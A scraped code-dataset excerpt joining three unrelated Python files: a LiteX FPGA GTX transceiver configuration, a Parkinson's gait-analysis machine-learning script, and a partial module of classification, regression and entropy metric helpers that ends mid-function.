i_RXLPMLFHOLD =0,
# Receive Ports - RX Equalizer Ports
i_RXDFEAGCHOLD =0,
i_RXDFEAGCOVRDEN =0,
i_RXDFECM1EN =0,
i_RXDFELFHOLD =0,
i_RXDFELFOVRDEN =1,
i_RXDFELPMRESET =0,
i_RXDFETAP2HOLD =0,
i_RXDFETAP2OVRDEN =0,
i_RXDFETAP3HOLD =0,
i_RXDFETAP3OVRDEN =0,
i_RXDFETAP4HOLD =0,
i_RXDFETAP4OVRDEN =0,
i_RXDFETAP5HOLD =0,
i_RXDFETAP5OVRDEN =0,
i_RXDFEUTHOLD =0,
i_RXDFEUTOVRDEN =0,
i_RXDFEVPHOLD =0,
i_RXDFEVPOVRDEN =0,
i_RXDFEVSEN =0,
i_RXLPMLFKLOVRDEN =0,
#o_RXMONITOROUT =
i_RXMONITORSEL =0,
i_RXOSHOLD =0,
i_RXOSOVRDEN =0,
            # Receive Ports - RX Fabric Clock Output Control Ports
#o_RXRATEDONE =,
# Receive Ports - RX Fabric Output Control Ports
o_RXOUTCLK =self.rxoutclk,
#o_RXOUTCLKFABRIC =,
#o_RXOUTCLKPCS =,
i_RXOUTCLKSEL =0b010,
# Receive Ports - RX Gearbox Ports
#o_RXDATAVALID =,
#o_RXHEADER =,
#o_RXHEADERVALID =,
#o_RXSTARTOFSEQ =,
# Receive Ports - RX Gearbox Ports
i_RXGEARBOXSLIP =0,
# Receive Ports - RX Initialization and Reset Ports
i_GTRXRESET =rx_init.gtXxreset,
i_RXOOBRESET =0,
i_RXPCSRESET =0,
i_RXPMARESET =0,
# Receive Ports - RX Margin Analysis ports
i_RXLPMEN =0,
# Receive Ports - RX OOB Signaling ports
#o_RXCOMSASDET =,
#o_RXCOMWAKEDET =,
# Receive Ports - RX OOB Signaling ports
#o_RXCOMINITDET =,
# Receive Ports - RX OOB signalling Ports
#o_RXELECIDLE =,
i_RXELECIDLEMODE =0b11,
# Receive Ports - RX Polarity Control Ports
i_RXPOLARITY =rx_polarity,
# Receive Ports - RX gearbox ports
i_RXSLIDE =0,
# Receive Ports - RX8B/10B Decoder Ports
#o_RXCHARISCOMMA =,
o_RXCHARISK =Cat(*[rxdata[10*i+8] for i in range(nwords)]),
# Receive Ports - Rx Channel Bonding Ports
i_RXCHBONDI =0b00000,
# Receive Ports -RX Initialization and Reset Ports
o_RXRESETDONE =rx_init.Xxresetdone,
# Rx AFE Ports
i_RXQPIEN =0,
#o_RXQPISENN =,
#o_RXQPISENP =,
# TX Buffer Bypass Ports
i_TXPHDLYTSTCLK =0,
# TX Configurable Driver Ports
i_TXPOSTCURSOR =0b00000,
i_TXPOSTCURSORINV =0,
i_TXPRECURSOR =0b00000,
i_TXPRECURSORINV =0,
i_TXQPIBIASEN =0,
i_TXQPISTRONGPDOWN =0,
i_TXQPIWEAKPUP =0,
# TX Initialization and Reset Ports
i_CFGRESET =0,
i_GTTXRESET =tx_init.gtXxreset,
#o_PCSRSVDOUT =,
i_TXUSERRDY =tx_init.Xxuserrdy,
# Transceiver Reset Mode Operation
i_GTRESETSEL =0,
i_RESETOVRD =0,
# Transmit Ports - 8b10b Encoder Control Ports
i_TXCHARDISPMODE =Cat(*[txdata[10*i+9] for i in range(nwords)]),
i_TXCHARDISPVAL =Cat(*[txdata[10*i+8] for i in range(nwords)]),
# Transmit Ports - FPGA TX Interface Ports
i_TXUSRCLK =ClockSignal("tx"),
i_TXUSRCLK2 =ClockSignal("tx"),
# Transmit Ports - PCI Express Ports
i_TXELECIDLE =0,
i_TXMARGIN =0b000,
i_TXRATE =0b000,
i_TXSWING =0,
# Transmit Ports - Pattern Generator Ports
i_TXPRBSFORCEERR =0,
# Transmit Ports - TX Buffer Bypass Ports
i_TXDLYBYPASS =1 if tx_buffer_enable else 0,
i_TXDLYEN =0,
i_TXDLYHOLD =0,
i_TXDLYOVRDEN =0,
i_TXDLYSRESET =tx_init.Xxdlysreset,
o_TXDLYSRESETDONE =tx_init.Xxdlysresetdone,
i_TXDLYUPDOWN =0,
i_TXPHALIGN =0,
o_TXPHALIGNDONE =tx_init.Xxphaligndone,
i_TXPHALIGNEN =0,
i_TXPHDLYPD =0,
i_TXPHDLYRESET =0,
i_TXPHINIT =0,
#o_TXPHINITDONE =,
i_TXPHOVRDEN =0,
# Transmit Ports - TX Buffer Ports
#o_TXBUFSTATUS =,
# Transmit Ports - TX Configurable Driver Ports
i_TXBUFDIFFCTRL =0b100,
i_TXDEEMPH =0,
i_TXDIFFCTRL =0b1000,
i_TXDIFFPD =0,
i_TXINHIBIT =self.tx_disable,
i_TXMAINCURSOR =0b0000000,
i_TXPISOPD =0,
# Transmit Ports - TX Data Path interface
i_TXDATA =Cat(*[txdata[10*i:10*i+8] for i in range(nwords)]),
# Transmit Ports - TX Driver and OOB signaling
o_GTXTXN =tx_pads.n,
o_GTXTXP =tx_pads.p,
# Transmit Ports - TX Fabric Clock Output Control Ports
o_TXOUTCLK =self.txoutclk,
#o_TXOUTCLKFABRIC =,
#o_TXOUTCLKPCS =,
i_TXOUTCLKSEL =0b010 if tx_buffer_enable else 0b011,
#o_TXRATEDONE =,
# Transmit Ports - TX Gearbox Ports
i_TXCHARISK =0b00000000,
#o_TXGEARBOXREADY =,
i_TXHEADER =0b000,
i_TXSEQUENCE =0b0000000,
i_TXSTARTSEQ =0,
# Transmit Ports - TX Initialization and Reset Ports
i_TXPCSRESET =0,
i_TXPMARESET =0,
o_TXRESETDONE =tx_init.Xxresetdone,
# Transmit Ports - TX OOB signaling Ports
#o_TXCOMFINISH =,
i_TXCOMINIT =0,
i_TXCOMSAS =0,
i_TXCOMWAKE =0,
i_TXPDELECIDLEMODE =0,
# Transmit Ports - TX Polarity Control Ports
i_TXPOLARITY =tx_polarity,
# Transmit Ports - TX Receiver Detection Ports
i_TXDETECTRX =0,
# Transmit Ports - TX8b/10b Encoder Ports
i_TX8B10BBYPASS =0b00000000,
# Transmit Ports - pattern Generator Ports
i_TXPRBSSEL =0b000,
# Tx Configurable Driver Ports
#o_TXQPISENN =,
#o_TXQPISENP =,
)
# tx clocking
tx_reset_deglitched = Signal()
tx_reset_deglitched.attr.add("no_retiming")
self.sync += tx_reset_deglitched.eq(~tx_init.done)
self.clock_domains.cd_tx = ClockDomain()
txoutclk_bufg = Signal()
self.specials += Instance("BUFG", i_I=self.txoutclk, o_O=txoutclk_bufg)
if not tx_buffer_enable:
txoutclk_div = pll.config["clkin"]/self.tx_clk_freq
else:
txoutclk_div = 1
# Use txoutclk_bufg when divider is 1
if txoutclk_div == 1:
self.comb += self.cd_tx.clk.eq(txoutclk_bufg)
self.specials += AsyncResetSynchronizer(self.cd_tx, tx_reset_deglitched)
# Use a BUFR when integer divider (with BUFR_DIVIDE)
elif txoutclk_div == int(txoutclk_div):
txoutclk_bufr = Signal()
self.specials += [
Instance("BUFR", i_I=txoutclk_bufg, o_O=txoutclk_bufr,
i_CE=1, p_BUFR_DIVIDE=str(int(txoutclk_div))),
Instance("BUFG", i_I=txoutclk_bufr, o_O=self.cd_tx.clk),
AsyncResetSynchronizer(self.cd_tx, tx_reset_deglitched)
]
# Use a PLL when non-integer divider
else:
txoutclk_pll = S7PLL()
self.comb += txoutclk_pll.reset.eq(tx_reset_deglitched)
self.submodules += txoutclk_pll
txoutclk_pll.register_clkin(txoutclk_bufg, pll.config["clkin"])
txoutclk_pll.create_clkout(self.cd_tx, self.tx_clk_freq)
# rx clocking
rx_reset_deglitched = Signal()
rx_reset_deglitched.attr.add("no_retiming")
self.sync.tx += rx_reset_deglitched.eq(~rx_init.done)
self.clock_domains.cd_rx = ClockDomain()
self.specials += [
Instance("BUFG", i_I=self.rxoutclk, o_O=self.cd_rx.clk),
AsyncResetSynchronizer(self.cd_rx, rx_reset_deglitched)
]
# tx data and prbs
self.submodules.tx_prbs = ClockDomainsRenamer("tx")(PRBSTX(data_width, True))
self.comb += self.tx_prbs.config.eq(tx_prbs_config)
self.comb += [
self.tx_prbs.i.eq(Cat(*[self.encoder.output[i] for i in range(nwords)])),
If(tx_produce_square_wave,
# square wave @ linerate/data_width for scope observation
txdata.eq(Signal(data_width, reset=1<<(data_width//2)-1))
).Else(
txdata.eq(self.tx_prbs.o)
)
]
# rx data and prbs
self.submodules.rx_prbs = ClockDomainsRenamer("rx")(PRBSRX(data_width, True))
self.comb += [
self.rx_prbs.config.eq(rx_prbs_config),
rx_prbs_errors.eq(self.rx_prbs.errors)
]
for i in range(nwords):
self.comb += self.decoders[i].input.eq(rxdata[10*i:10*(i+1)])
self.comb += self.rx_prbs.i.eq(rxdata)
# clock alignment
if clock_aligner:
clock_aligner = BruteforceClockAligner(0b0101111100, self.tx_clk_freq)
self.submodules.clock_aligner = clock_aligner
self.comb += [
clock_aligner.rxdata.eq(rxdata),
rx_init.restart.eq(clock_aligner.restart | self.rx_restart),
self.rx_ready.eq(clock_aligner.ready)
]
else:
self.comb += self.rx_ready.eq(rx_init.done)
def add_base_control(self):
if hasattr(self, "clock_aligner"):
self._clock_aligner_disable = CSRStorage()
self._tx_restart = CSR()
self._tx_disable = CSRStorage(reset=0b0)
self._tx_produce_square_wave = CSRStorage(reset=0b0)
self._rx_ready = CSRStatus()
self._rx_restart = CSR()
if hasattr(self, "clock_aligner"):
self.comb += self.clock_aligner.disable.eq(self._clock_aligner_disable.storage)
self.comb += [
self.tx_restart.eq(self._tx_restart.re),
self.tx_disable.eq(self._tx_disable.storage),
self.tx_produce_square_wave.eq(self._tx_produce_square_wave.storage),
self._rx_ready.status.eq(self.rx_ready),
self.rx_restart.eq(self._rx_restart.re)
]
def add_prbs_control(self):
self._tx_prbs_config = CSRStorage(2, reset=0b00)
self._rx_prbs_config = CSRStorage(2, reset=0b00)
self._rx_prbs_errors = CSRStatus(32)
self.comb += [
self.tx_prbs_config.eq(self._tx_prbs_config.storage),
self.rx_prbs_config.eq(self._rx_prbs_config.storage),
self._rx_prbs_errors.status.eq(self.rx_prbs_errors)
]
def add_loopback_control(self):
self._loopback = CSRStorage(3)
self.comb += self.loopback.eq(self._loopback.storage)
def add_polarity_control(self):
self._tx_polarity = CSRStorage()
self._rx_polarity = CSRStorage()
self.gtx_params.update(
i_TXPOLARITY = self._tx_polarity.storage,
i_RXPOLARITY = self._rx_polarity.storage
)
def add_electrical_control(self):
self._tx_diffctrl = CSRStorage(4, reset=0b1111)
self._tx_postcursor = CSRStorage(5, reset=0b00000)
self._tx_postcursor_inv = CSRStorage(1, reset=0b0)
self._tx_precursor = CSRStorage(5, reset=0b00000)
self._tx_precursor_inv = CSRStorage(1, reset=0b0)
self.gtx_params.update(
i_TXDIFFCTRL = self._tx_diffctrl.storage,
i_TXPOSTCURSOR = self._tx_postcursor.storage,
i_TXPOSTCURSORINV = self._tx_postcursor_inv.storage,
i_TXPRECURSOR = self._tx_precursor.storage,
i_TXPRECURSORINV = self._tx_precursor_inv.storage,
)
def add_controls(self):
self.add_base_control()
self.add_prbs_control()
self.add_loopback_control()
self.add_polarity_control()
self.add_electrical_control()
def do_finalize(self):
self.specials += Instance("GTXE2_CHANNEL", **self.gtx_params)
| kamejoko80/linux-on-litex-vexriscv-legacy | liteiclink/liteiclink/transceiver/gtx_7series.py | gtx_7series.py | py | 47,116 | python | en | code | 0 | github-code | 36 |
37986696093 | """
This script performs the analysis for the Ga study
"""
# import libraries
import re
import tsfresh
import numpy as np
import pandas as pd
from pandas import ExcelWriter
from sklearn.preprocessing import LabelBinarizer
import matplotlib
import matplotlib.pyplot as plt
import seaborn as sns
sns.set_style("darkgrid")
from sklearn.preprocessing import LabelEncoder
from sklearn.model_selection import StratifiedShuffleSplit, train_test_split
from ml_models.LinearRegression import LinearRegressionCalculator
from ml_models.DecisionTreeRegression import DecisionTreeRegressionCalculator
from ml_models.RandomForestRegression import RandomForestRegressionCalculator
# import methods from other scripts / packages
from storage.DataLoader import data_loader
from feature_extraction.FFT import fft_extractor
from feature_extraction.abs_energy import AbsoluteEnergyCalculator
# Constant declarations
col_names = ['Time_sec', 'Sens_L1', 'Sens_L2', 'Sens_L3', 'Sens_L4', 'Sens_L5', 'Sens_L6', 'Sens_L7', 'Sens_L8',
'Sens_R1', 'Sens_R2', 'Sens_R3', 'Sens_R4', 'Sens_R5', 'Sens_R6', 'Sens_R7', 'Sens_R8', 'TF_L', 'TF_R']
"""
Main Controller
"""
def study_ga_controller(demographics_data):
group_1_data, group_2_data = split_group_data(demographics_data)
group_1_analysis(group_1_data, group_2_data)
# group_2_analysis(group_2_data)
def split_group_data(demographics_data):
group_1_data = demographics_data[demographics_data['Group'] == 1]
group_2_data = demographics_data[demographics_data['Group'] == 2]
return group_1_data, group_2_data
def print_newline():
print("")
def print_seperator():
print("--------------------------")
# ----------------------------------------------------- GROUP 1 ------------------------------------------------------ #
def group_1_analysis(group_1_data, group_2_data):
print_newline()
print("#####################################")
print("Group 1 Analysis:")
print("#####################################")
# Create Empty Dataframe
all_patient_dataframe = pd.DataFrame(
columns=['ID', 'Patient_Number', 'Study', 'Patient_Type', 'Foot', 'file_number', 'Median', 'Max', 'Min', 'Skewness', 'Std', 'Variance', 'Abs_Energy',
'coeff_1', 'coeff_2', 'coeff_3', 'coeff_4'])
df1 = pd.DataFrame([[np.nan] * len(all_patient_dataframe.columns)], columns=all_patient_dataframe.columns)
patient_data_loader = data_loader()
patient_data_file_paths = patient_data_loader.get_patient_file_paths()
group_1_2_data = group_1_data[['ID', 'Gender', 'HoehnYahr']].append(group_2_data[['ID', 'Gender', 'HoehnYahr']])
# all_patient_dataframe = GenerateAllPatientDataframe(patient_data_loader, patient_data_file_paths, all_patient_dataframe, df1)
# all_patient_dataframe = pd.merge(all_patient_dataframe, group_1_2_data, how='left', on=['ID'])
# writer = ExcelWriter('Study_Ga_df.xlsx')
# all_patient_dataframe.to_excel(writer, 'Sheet1')
# writer.save()
all_patient_dataframe = pd.read_excel('Study_Ga_df.xlsx', sheet_name="Sheet1")
split = StratifiedShuffleSplit(n_splits=1, test_size=0.2, random_state=42)
for train_index, test_index in split.split(all_patient_dataframe, all_patient_dataframe["HoehnYahr"]):
strat_train_set = all_patient_dataframe.loc[train_index]
strat_test_set = all_patient_dataframe.loc[test_index]
'''
print("Train Set:")
print_newline()
print(strat_train_set)
print_newline()
print("Test Set:")
print_newline()
print(strat_test_set)
'''
train_models(strat_train_set, strat_test_set)
def GenerateAllPatientDataframe(patient_data_loader, patient_data_file_paths, all_patient_dataframe, df1):
for patient_file_path in patient_data_file_paths:
# Read patient data
patient_data = patient_data_loader.read_patient_data(patient_file_path)
filename_fields = extract_fields_from_filename(patient_data_loader, patient_file_path)
study_name = filename_fields.group(1)
patient_type = filename_fields.group(2)
patient_number = filename_fields.group(3)
data_file_number = filename_fields.group(4)
# plot_patient_data(patient_data, 'Time_sec', 'TF_L', "Total force on left foot for patient: Group 1 " + study_name + patient_number)
# plot_zoomed_patient_data(patient_data, 'Time_sec', 'TF_L', "Total force on left foot for patient: Group 1 " + study_name + patient_number)
# add empty row entry
all_patient_dataframe = df1.append(all_patient_dataframe, ignore_index=True)
all_patient_dataframe = add_patient_data(all_patient_dataframe, patient_data, patient_number, study_name, patient_type, 'left', data_file_number)
all_patient_dataframe = df1.append(all_patient_dataframe, ignore_index=True)
all_patient_dataframe = add_patient_data(all_patient_dataframe, patient_data, patient_number, study_name, patient_type, 'right', data_file_number)
return all_patient_dataframe
def extract_fields_from_filename(patient_data_loader, patient_file_path):
patient_filename = patient_data_loader.extract_file_name(patient_file_path)
pattern = "([A-Z][a-z])([A-Z][a-z])([\d]+)_([\d]+)"
fields_from_filename = re.match(pattern, patient_filename)
return fields_from_filename
def add_patient_data(all_patient_dataframe, patient_data, patient_number, patient_study, patient_type, foot, data_file_number):
all_patient_dataframe.loc[0, 'ID'] = patient_study + patient_type + patient_number
all_patient_dataframe.loc[0, 'Patient_Number'] = patient_number
all_patient_dataframe.loc[0, 'Study'] = patient_study
all_patient_dataframe.loc[0, 'Patient_Type'] = patient_type
all_patient_dataframe.loc[0, 'Foot'] = foot
all_patient_dataframe.loc[0, 'file_number'] = data_file_number
fft = fft_extractor()
abs_en = AbsoluteEnergyCalculator()
all_patient_dataframe = extract_features(all_patient_dataframe, patient_data, foot, fft, abs_en)
return all_patient_dataframe
def train_models(strat_train_set, strat_test_set):
strat_train_set, strat_train_labels, strat_test_set, strat_test_labels = clean_sets(strat_train_set, strat_test_set)
print(strat_test_labels.describe())
print_seperator()
print("Linear Regression:")
lr_calculator = LinearRegressionCalculator()
lr_calculator.train_model(strat_train_set, strat_train_labels, strat_test_set, strat_test_labels)
print_seperator()
print_seperator()
print("Decision Tree Regression:")
tree_calculator = DecisionTreeRegressionCalculator()
tree_calculator.train_model(strat_train_set, strat_train_labels, strat_test_set, strat_test_labels)
print_seperator()
print_seperator()
print("Random Forest Regression:")
rf_calculator = RandomForestRegressionCalculator()
rf_calculator.train_model(strat_train_set, strat_train_labels, strat_test_set, strat_test_labels)
print_seperator()
def clean_sets(strat_train_set, strat_test_set):
data_col = ['Patient_Type', 'Foot', 'file_number', 'Median', 'Max', 'Min', 'Skewness', 'Std', 'Variance', 'Abs_Energy',
'coeff_1', 'coeff_2', 'coeff_3', 'coeff_4', 'Gender']
strat_train_set['Foot'] = strat_train_set['Foot'].apply(lambda x: '0' if x == 'left' else '1')
strat_train_set['Foot'] = strat_train_set['Foot'].astype(int)
strat_test_set['Foot'] = strat_test_set['Foot'].apply(lambda x: '0' if x == 'left' else '1')
strat_test_set['Foot'] = strat_test_set['Foot'].astype(int)
strat_train_set['Patient_Type'] = strat_train_set['Patient_Type'].apply(lambda x: '0' if x == 'Co' else '1')
strat_train_set['Patient_Type'] = strat_train_set['Patient_Type'].astype(int)
strat_test_set['Patient_Type'] = strat_test_set['Patient_Type'].apply(lambda x: '0' if x == 'Co' else '1')
strat_test_set['Patient_Type'] = strat_test_set['Patient_Type'].astype(int)
strat_train_labels = strat_train_set.loc[:, 'HoehnYahr']
strat_train_set = strat_train_set[data_col]
strat_test_labels = strat_test_set.loc[:, 'HoehnYahr']
strat_test_set = strat_test_set[data_col]
return strat_train_set, strat_train_labels, strat_test_set, strat_test_labels
# ----------------------------------------------------- GROUP 2 ------------------------------------------------------ #
def group_2_analysis(group_2_data):
print_newline()
print("#####################################")
print("Group 2 Analysis:")
print("#####################################")
# group_2_study_ga()
# group_2_study_ju()
# group_2_study_si()
# ------------------------------------------ FEATURE EXTRACTION METHODS --------------------------------------------- #
def find_gait_cycle(patient_data):
'''
gait_cycle = pd.DataFrame(patient_data[(patient_data['Sens_L1'] == 0) & (patient_data['Sens_L2'] == 0) &
(patient_data['Sens_L3'] == 0) & (patient_data['Sens_L4'] == 0) &
(patient_data['Sens_L5'] == 0) & (patient_data['Sens_L6'] == 0) &
(patient_data['Sens_L7'] == 0) & (patient_data['Sens_L8'] == 0)]['Time_sec'])
'''
gait_cycle = pd.DataFrame(patient_data[(patient_data['TF_L'] == 0)]['Time_sec'])
gait_cycle['Time_sec'] = gait_cycle['Time_sec'].astype(int)
gait_cycle = gait_cycle['Time_sec'].unique()
print_newline()
print_seperator()
print("Values with zero VGRF:\n")
print(gait_cycle)
print_seperator()
def extract_features(all_patient_dataframe, patient_data, foot, fft, abs_en):
if foot == "left":
all_patient_dataframe = add_foot_coeffs(all_patient_dataframe, fft, patient_data, 'left')
all_patient_dataframe.loc[0, 'Abs_Energy'] = abs_en.calculate_abs_energy(patient_data[['Time_sec', 'TF_L']], 'TF_L')
all_patient_dataframe = extract_eda_features(patient_data[['Time_sec', 'TF_L']], 'TF_L', all_patient_dataframe)
elif foot == "right":
all_patient_dataframe = add_foot_coeffs(all_patient_dataframe, fft, patient_data, 'right')
all_patient_dataframe.loc[0, 'Abs_Energy'] = abs_en.calculate_abs_energy(patient_data[['Time_sec', 'TF_R']], 'TF_R')
all_patient_dataframe = extract_eda_features(patient_data[['Time_sec', 'TF_R']], 'TF_R', all_patient_dataframe)
return all_patient_dataframe
def add_foot_coeffs(all_patient_dataframe, fft, patient_data, feet_type):
if feet_type == 'left':
foot_coeff = fft.calculate_fft_coeff(patient_data[['Time_sec', 'TF_L']], 'TF_L')
elif feet_type == 'right':
foot_coeff = fft.calculate_fft_coeff(patient_data[['Time_sec', 'TF_R']], 'TF_R')
else:
raise ValueError("add_foot_coeffs() : Wrong value supplied")
all_patient_dataframe.loc[0, 'coeff_1'] = foot_coeff['coeff_1__attr_"real"']
all_patient_dataframe.loc[0, 'coeff_2'] = foot_coeff['coeff_2__attr_"real"']
all_patient_dataframe.loc[0, 'coeff_3'] = foot_coeff['coeff_3__attr_"real"']
all_patient_dataframe.loc[0, 'coeff_4'] = foot_coeff['coeff_4__attr_"real"']
return all_patient_dataframe
def extract_eda_features(patient_data, col_name, all_patient_dataframe):
all_patient_dataframe.loc[0, 'Median'] = tsfresh.feature_extraction.feature_calculators.median(patient_data[col_name])
all_patient_dataframe.loc[0, 'Max'] = tsfresh.feature_extraction.feature_calculators.maximum(patient_data[col_name])
all_patient_dataframe.loc[0, 'Min'] = tsfresh.feature_extraction.feature_calculators.minimum(patient_data[col_name])
all_patient_dataframe.loc[0, 'Skewness'] = tsfresh.feature_extraction.feature_calculators.skewness(patient_data[col_name])
all_patient_dataframe.loc[0, 'Std'] = tsfresh.feature_extraction.feature_calculators.standard_deviation(patient_data[col_name])
all_patient_dataframe.loc[0, 'Variance'] = tsfresh.feature_extraction.feature_calculators.variance(patient_data[col_name])
return all_patient_dataframe
# -------------------------------------------------- PLOTTING METHODS ------------------------------------------------ #
def plot_patient_data(patient_df, x_col_name, y_col_name, plot_title):
ax = sns.lineplot(x=x_col_name, y=y_col_name, data=patient_df)
ax.set_title(plot_title)
plt.show()
def plot_zoomed_patient_data(patient_df, x_col_name, y_col_name, plot_title):
zoomed_time_data = patient_df[patient_df[x_col_name] < 20]
ax = sns.lineplot(x=x_col_name, y=y_col_name, data=zoomed_time_data)
ax.set_title(plot_title)
plt.show()
def plot_sensor_data(patient_df, x_col_name, y_col_name, sensor_name):
ax = sns.lineplot(x=x_col_name, y=y_col_name, data=patient_df)
ax.set_title(sensor_name + "reading over time")
plt.show()
| emilymacq/Project-Clear-Lungs | Parkinsons_ML/main/Study_Ga.py | Study_Ga.py | py | 12,820 | python | en | code | 2 | github-code | 36 |
27770003302 | import numpy as np
import pandas as pd
import matplotlib
import matplotlib.pyplot as plt
import sklearn
import xgboost
from sklearn import metrics
from decimal import *
import graphviz
'''
New MingLiU (新細明體): PMingLiU
MingLiU (細明體): MingLiU
BiauKai (標楷體): DFKai-SB
SimHei (黑体): SimHei
SimSun (宋体): SimSun
NSimSun (新宋体): NSimSun
FangSong (仿宋): FangSong
KaiTi (楷体): KaiTi
FangSong_GB2312 (仿宋_GB2312): FangSong_GB2312
KaiTi_GB2312 (楷体_GB2312): KaiTi_GB2312
Microsoft JhengHei (微軟正黑體): Microsoft JhengHei
Microsoft YaHei (微软雅黑体): Microsoft YaHei
————————————————
metrics.confusion_matrix(y_true, y_pred, labels=None, sample_weight=None)
metrics.accuracy_score(y_true,y_pred)
metrics.average_precision_score(y_true, y_score, average='macro', sample_weight=None)
metrics.precision_score(y_true, y_pred, labels=None, pos_label=1, average='binary',)
metrics.recall_score(y_true, y_pred, labels=None, pos_label=1, average='binary', sample_weight=None)
metrics.f1_score(y_true, y_pred, labels=None, pos_label=1, average='binary', sample_weight=None)
precision,recall,thresholds=metrics.precision_recall_curve(y_true,y_pred)
>>> plt.plot(recall, precision)
fpr,tpr,thresholds = metrics.roc_curve(y_true, y_ pred, pos_label=None, sample_weight=None, drop_intermediate=True)
>>> plt.plot(fpr,tpr)
metrics.roc_auc_score(y_true, y_pred, average='macro', sample_weight=None)
metrics.auc(fpr, tpr)
metrics.mean_absolute_error(y_true, y_pred, sample_weight=none, multioutput='uniform_average')
metrics.mean_squared_error(y_true, y_pred, sample_weight=None, multioutput='uniform_average')
metrics.r2_score(y_true, y_pred, sample_weight=None, multioutput='uniform_average')
For multi-class problems the 'average' argument controls how per-class scores are combined ('macro' and 'weighted' are the usual choices):
'macro': compute the metric for each label and take the unweighted mean; class imbalance is not taken into account.
'weighted': compute the metric for each label and take the mean weighted by the number of true instances of each label.
'micro': count TP, FN and FP globally, then compute the score from those totals.
'''
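# Hedged illustration of the 'average' argument described above (the toy labels
# are assumed values, not project data): macro averages per-class scores equally,
# weighted weights them by class support, micro pools TP/FP/FN before scoring.
def _average_modes_example():
    y_true = [0, 0, 1, 1, 2]
    y_pred = [0, 1, 1, 1, 2]
    return {
        'macro': metrics.precision_score(y_true, y_pred, average='macro'),
        'weighted': metrics.precision_score(y_true, y_pred, average='weighted'),
        'micro': metrics.precision_score(y_true, y_pred, average='micro'),
    }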
def classificationModel(y_true,y_pred):
    nameValueDict={}
    # confusion matrix
    confusionMatrix = metrics.confusion_matrix(y_true, y_pred)
    # accuracy
    accuracyScore = metrics.accuracy_score(y_true, y_pred)
    # precision
    precisionScore = metrics.precision_score(y_true, y_pred,average=None)
    # recall
    recallScore = metrics.recall_score(y_true, y_pred,average=None)
    # f1 (only meaningful for binary classification)
    # None, 'micro', 'macro', 'weighted'
    f1Score = metrics.f1_score(y_true, y_pred,average=None)
    # precision-recall curve
    precision,recall,thresholds = metrics.precision_recall_curve(y_true,y_pred)
    plt.plot(recall, precision)
    fpr, tpr, thresholds = metrics.roc_curve(y_true, y_pred,drop_intermediate = True)
    # >>> plt.plot(fpr, tpr)
    rocAucScore = metrics.roc_auc_score(y_true, y_pred)
    aucArea = metrics.auc(fpr, tpr)
    nameValueDict.update({'accuracyScore':accuracyScore})
    nameValueDict.update({'precisionScore':precisionScore})
    nameValueDict.update({'recallScore':recallScore})
    # nameValueDict.update({'f1Score':f1Score})
    nameValueDict.update({'rocAucScore':rocAucScore})
    nameValueDict.update({'auc':metrics.auc(fpr, tpr)})
    nameValueDict.update({'aucArea':aucArea})
    return nameValueDict
def regressionModel(y_true,y_pred):
nameValueDict = {}
MAE = metrics.mean_absolute_error(y_true, y_pred)
MSE = metrics.mean_squared_error(y_true, y_pred)
r2 = metrics.r2_score(y_true, y_pred)
nameValueDict.update({'MAE':MAE})
nameValueDict.update({'MSE':MSE})
nameValueDict.update({'r2':r2})
return nameValueDict
def entU(u):
return [np.sum([p * np.log2(1 / p) for p in ct / np.sum(ct)]) for ct in [np.unique(u, return_counts=True)[1]]][0]
# conditional entropy
def uConditionV(u,v):
entu = [np.sum([p * np.log2(1 / p) for p in ct / np.sum(ct)]) for ct in [np.unique(u, return_counts=True)[1]]][0]
entv = [np.sum([p * np.log2(1 / p) for p in ct / np.sum(ct)]) for ct in [np.unique(v, return_counts=True)[1]]][0]
    # v is the explanatory (conditioning) variable
vid, vct = np.unique(v, return_counts=True)
    # entropy of u within each group of v
vidEntropy = [np.sum([p * np.log2(1 / p) for p in ct / np.sum(ct)]) for ct in [np.unique(u[v == i], return_counts=True)[1] for i in vid]]
    # conditional entropy H(u|v)
entUconditonV= np.sum(np.array(vidEntropy) * (vct / np.sum(vct)))
return entUconditonV
# information gain
def gainuv(u,v):
return entU(u) - uConditionV(u,v)
def gainRatio(u, v):
return gainuv(u,v) / entU((v))
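# Hedged worked example for the entropy/gain helpers above (the toy arrays are
# assumed values): a balanced binary target carries 1 bit of entropy, and a
# feature identical to the target removes all of it, so the gain is 1 bit.
def _entropy_gain_example():
    u = np.array([0, 0, 1, 1])  # target
    v = np.array([0, 0, 1, 1])  # feature identical to the target
    assert entU(u) == 1.0       # H(u) = 0.5*log2(2) + 0.5*log2(2)
    assert uConditionV(u, v) == 0.0
    assert gainuv(u, v) == 1.0
    return gainRatio(u, v)      # gain / H(v) = 1.0 here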
def display_version():
print('np.version : ',np.__version__)
print('pd.version : ',pd.__version__)
print('matplotlib.version : ',matplotlib.__version__)
print('sklearn.version : ',sklearn.__version__)
print('xgboost.version : ',xgboost.__version__)
print('graphviz.version',graphviz.__version__)
display_version()
# data inspection helper
def overview(data):
print('\n======================= data overview =======================\n')
    print('\nNumber of duplicate rows : ',data.duplicated().sum(axis=0))
    print('Duplicate records:')
    print(data[data.duplicated()])
    print('\nOverall missing-value summary : ')
    print('Total records : ',data.shape[0])
    print('\nNon-null count per column:')
    print(data.notnull().sum())
    print('\nNull count per column:')
    print(data.isnull().sum())
    print('\nMissing ratio per column')
    print(data.isnull().mean())
    print('\nRows with missing values\n')
    print(data.loc[data.isnull().sum(axis=1)>0,:])
    print('\nColumns with missing values\n')
    print(data.loc[:,data.isnull().sum(axis=0)>0])
    print('\nMissing region (missing rows x missing columns)\n')
    print(data.loc[data.isnull().sum(axis=1) > 0, data.isnull().sum(axis=0) > 0])
    print('\n\n')
    print('\nColumn name and the row indices of its missing values\n')
for i in data.columns:
print(i,' : ',list(np.where(pd.isna(data[i]))[0]))
print('\n\n')
def basicOperate(data):
print('\n\n')
    print('\nDropping duplicate rows\n')
data.drop_duplicates(inplace=True)
print('\n\n')
print('\n\n')
print('\n\n')
def dropRank(data,thresh):
threshold = thresh
    print('Showing rows with more than {} missing values; these rows will be dropped'.format(data.shape[1] - threshold))
print(data.loc[data.isnull().sum(axis=1) > data.shape[1] - threshold])
print('=======================================')
print(data.loc[data.isnull().sum(axis=1) == data.shape[1] - threshold])
print('=======================================')
    print('Showing rows with at least {} non-null values; these rows will be kept'.format(threshold))
print(data.dropna(thresh=threshold))
data.dropna(thresh=threshold,inplace=True)
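# Hedged example of the thresh semantics used above (the toy frame is an assumed
# value): dropna(thresh=k) keeps only the rows that have at least k non-null values.
def _drop_rank_example():
    df = pd.DataFrame({'a': [1, None, 3], 'b': [None, None, 6]})
    return df.dropna(thresh=2)  # keeps only the last row (2 non-null values)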
# Gini index for a discrete feature; x is the feature, y is the target flag
def giniC(x, y):
